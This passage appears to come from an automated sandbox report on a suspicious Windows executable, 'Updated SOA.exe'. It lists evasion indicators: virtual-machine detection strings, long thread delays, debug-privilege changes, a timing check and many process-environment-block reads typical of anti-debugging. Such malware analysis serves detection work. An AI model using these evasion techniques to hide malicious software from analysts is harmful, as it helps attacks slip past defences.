          Source: C:\Users\user\Desktop\Updated SOA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeThread delayed: delay time: 35013Jump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000008.00000000.265209117.0000000008907000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.263781825.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.265209117.0000000008907000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000008.00000000.275013016.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000008.00000000.279684794.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000008.00000000.275053287.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.264365029.000000000871F000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAJ
          Source: Updated SOA.exe, 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079100 mov eax, dword ptr fs:[00000030h]7_2_01079100
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079100 mov eax, dword ptr fs:[00000030h]7_2_01079100
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079100 mov eax, dword ptr fs:[00000030h]7_2_01079100
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01094120 mov eax, dword ptr fs:[00000030h]7_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01094120 mov eax, dword ptr fs:[00000030h]7_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01094120 mov eax, dword ptr fs:[00000030h]7_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01094120 mov eax, dword ptr fs:[00000030h]7_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01094120 mov ecx, dword ptr fs:[00000030h]7_2_01094120
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A513A mov eax, dword ptr fs:[00000030h]7_2_010A513A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A513A mov eax, dword ptr fs:[00000030h]7_2_010A513A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B944 mov eax, dword ptr fs:[00000030h]7_2_0109B944
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B944 mov eax, dword ptr fs:[00000030h]7_2_0109B944
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107C962 mov eax, dword ptr fs:[00000030h]7_2_0107C962
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107B171 mov eax, dword ptr fs:[00000030h]7_2_0107B171
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107B171 mov eax, dword ptr fs:[00000030h]7_2_0107B171
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109C182 mov eax, dword ptr fs:[00000030h]7_2_0109C182
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA185 mov eax, dword ptr fs:[00000030h]7_2_010AA185
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2990 mov eax, dword ptr fs:[00000030h]7_2_010A2990
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F69A6 mov eax, dword ptr fs:[00000030h]7_2_010F69A6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A61A0 mov eax, dword ptr fs:[00000030h]7_2_010A61A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A61A0 mov eax, dword ptr fs:[00000030h]7_2_010A61A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F51BE mov eax, dword ptr fs:[00000030h]7_2_010F51BE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F51BE mov eax, dword ptr fs:[00000030h]7_2_010F51BE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F51BE mov eax, dword ptr fs:[00000030h]7_2_010F51BE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F51BE mov eax, dword ptr fs:[00000030h]7_2_010F51BE
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov eax, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov eax, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov eax, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov ecx, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010999BF mov eax, dword ptr fs:[00000030h]7_2_010999BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011349A4 mov eax, dword ptr fs:[00000030h]7_2_011349A4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011349A4 mov eax, dword ptr fs:[00000030h]7_2_011349A4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011349A4 mov eax, dword ptr fs:[00000030h]7_2_011349A4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011349A4 mov eax, dword ptr fs:[00000030h]7_2_011349A4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107B1E1 mov eax, dword ptr fs:[00000030h]7_2_0107B1E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107B1E1 mov eax, dword ptr fs:[00000030h]7_2_0107B1E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107B1E1 mov eax, dword ptr fs:[00000030h]7_2_0107B1E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011041E8 mov eax, dword ptr fs:[00000030h]7_2_011041E8
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01144015 mov eax, dword ptr fs:[00000030h]7_2_01144015
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01144015 mov eax, dword ptr fs:[00000030h]7_2_01144015
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7016 mov eax, dword ptr fs:[00000030h]7_2_010F7016
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7016 mov eax, dword ptr fs:[00000030h]7_2_010F7016
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7016 mov eax, dword ptr fs:[00000030h]7_2_010F7016
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108B02A mov eax, dword ptr fs:[00000030h]7_2_0108B02A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108B02A mov eax, dword ptr fs:[00000030h]7_2_0108B02A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108B02A mov eax, dword ptr fs:[00000030h]7_2_0108B02A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108B02A mov eax, dword ptr fs:[00000030h]7_2_0108B02A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A002D mov eax, dword ptr fs:[00000030h]7_2_010A002D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A002D mov eax, dword ptr fs:[00000030h]7_2_010A002D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A002D mov eax, dword ptr fs:[00000030h]7_2_010A002D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A002D mov eax, dword ptr fs:[00000030h]7_2_010A002D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A002D mov eax, dword ptr fs:[00000030h]7_2_010A002D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A830 mov eax, dword ptr fs:[00000030h]7_2_0109A830
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A830 mov eax, dword ptr fs:[00000030h]7_2_0109A830
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A830 mov eax, dword ptr fs:[00000030h]7_2_0109A830
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A830 mov eax, dword ptr fs:[00000030h]7_2_0109A830
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01090050 mov eax, dword ptr fs:[00000030h]7_2_01090050
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01090050 mov eax, dword ptr fs:[00000030h]7_2_01090050
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132073 mov eax, dword ptr fs:[00000030h]7_2_01132073
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01141074 mov eax, dword ptr fs:[00000030h]7_2_01141074
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079080 mov eax, dword ptr fs:[00000030h]7_2_01079080
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F3884 mov eax, dword ptr fs:[00000030h]7_2_010F3884
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F3884 mov eax, dword ptr fs:[00000030h]7_2_010F3884
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B90AF mov eax, dword ptr fs:[00000030h]7_2_010B90AF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A20A0 mov eax, dword ptr fs:[00000030h]7_2_010A20A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AF0BF mov ecx, dword ptr fs:[00000030h]7_2_010AF0BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AF0BF mov eax, dword ptr fs:[00000030h]7_2_010AF0BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AF0BF mov eax, dword ptr fs:[00000030h]7_2_010AF0BF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov eax, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov eax, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov eax, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov eax, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110B8D0 mov eax, dword ptr fs:[00000030h]7_2_0110B8D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010740E1 mov eax, dword ptr fs:[00000030h]7_2_010740E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010740E1 mov eax, dword ptr fs:[00000030h]7_2_010740E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010740E1 mov eax, dword ptr fs:[00000030h]7_2_010740E1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010758EC mov eax, dword ptr fs:[00000030h]7_2_010758EC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B8E4 mov eax, dword ptr fs:[00000030h]7_2_0109B8E4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B8E4 mov eax, dword ptr fs:[00000030h]7_2_0109B8E4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A309 mov eax, dword ptr fs:[00000030h]7_2_0109A309
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113131B mov eax, dword ptr fs:[00000030h]7_2_0113131B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107DB40 mov eax, dword ptr fs:[00000030h]7_2_0107DB40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148B58 mov eax, dword ptr fs:[00000030h]7_2_01148B58
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107F358 mov eax, dword ptr fs:[00000030h]7_2_0107F358
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107DB60 mov ecx, dword ptr fs:[00000030h]7_2_0107DB60
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A3B7A mov eax, dword ptr fs:[00000030h]7_2_010A3B7A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A3B7A mov eax, dword ptr fs:[00000030h]7_2_010A3B7A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A138B mov eax, dword ptr fs:[00000030h]7_2_010A138B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01081B8F mov eax, dword ptr fs:[00000030h]7_2_01081B8F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01081B8F mov eax, dword ptr fs:[00000030h]7_2_01081B8F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112D380 mov ecx, dword ptr fs:[00000030h]7_2_0112D380
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113138A mov eax, dword ptr fs:[00000030h]7_2_0113138A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AB390 mov eax, dword ptr fs:[00000030h]7_2_010AB390
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2397 mov eax, dword ptr fs:[00000030h]7_2_010A2397
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4BAD mov eax, dword ptr fs:[00000030h]7_2_010A4BAD
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01145BA5 mov eax, dword ptr fs:[00000030h]7_2_01145BA5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F53CA mov eax, dword ptr fs:[00000030h]7_2_010F53CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F53CA mov eax, dword ptr fs:[00000030h]7_2_010F53CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109DBE9 mov eax, dword ptr fs:[00000030h]7_2_0109DBE9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A03E2 mov eax, dword ptr fs:[00000030h]7_2_010A03E2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov ecx, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov ecx, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011223E3 mov eax, dword ptr fs:[00000030h]7_2_011223E3
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01088A0A mov eax, dword ptr fs:[00000030h]7_2_01088A0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AA16 mov eax, dword ptr fs:[00000030h]7_2_0113AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AA16 mov eax, dword ptr fs:[00000030h]7_2_0113AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AA16 mov eax, dword ptr fs:[00000030h]7_2_0107AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AA16 mov eax, dword ptr fs:[00000030h]7_2_0107AA16
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01093A1C mov eax, dword ptr fs:[00000030h]7_2_01093A1C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov ecx, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01075210 mov eax, dword ptr fs:[00000030h]7_2_01075210
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109A229 mov eax, dword ptr fs:[00000030h]7_2_0109A229
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B4A2C mov eax, dword ptr fs:[00000030h]7_2_010B4A2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B4A2C mov eax, dword ptr fs:[00000030h]7_2_010B4A2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B236 mov eax, dword ptr fs:[00000030h]7_2_0109B236
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113EA55 mov eax, dword ptr fs:[00000030h]7_2_0113EA55
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01079240 mov eax, dword ptr fs:[00000030h]7_2_01079240
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01104257 mov eax, dword ptr fs:[00000030h]7_2_01104257
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B927A mov eax, dword ptr fs:[00000030h]7_2_010B927A
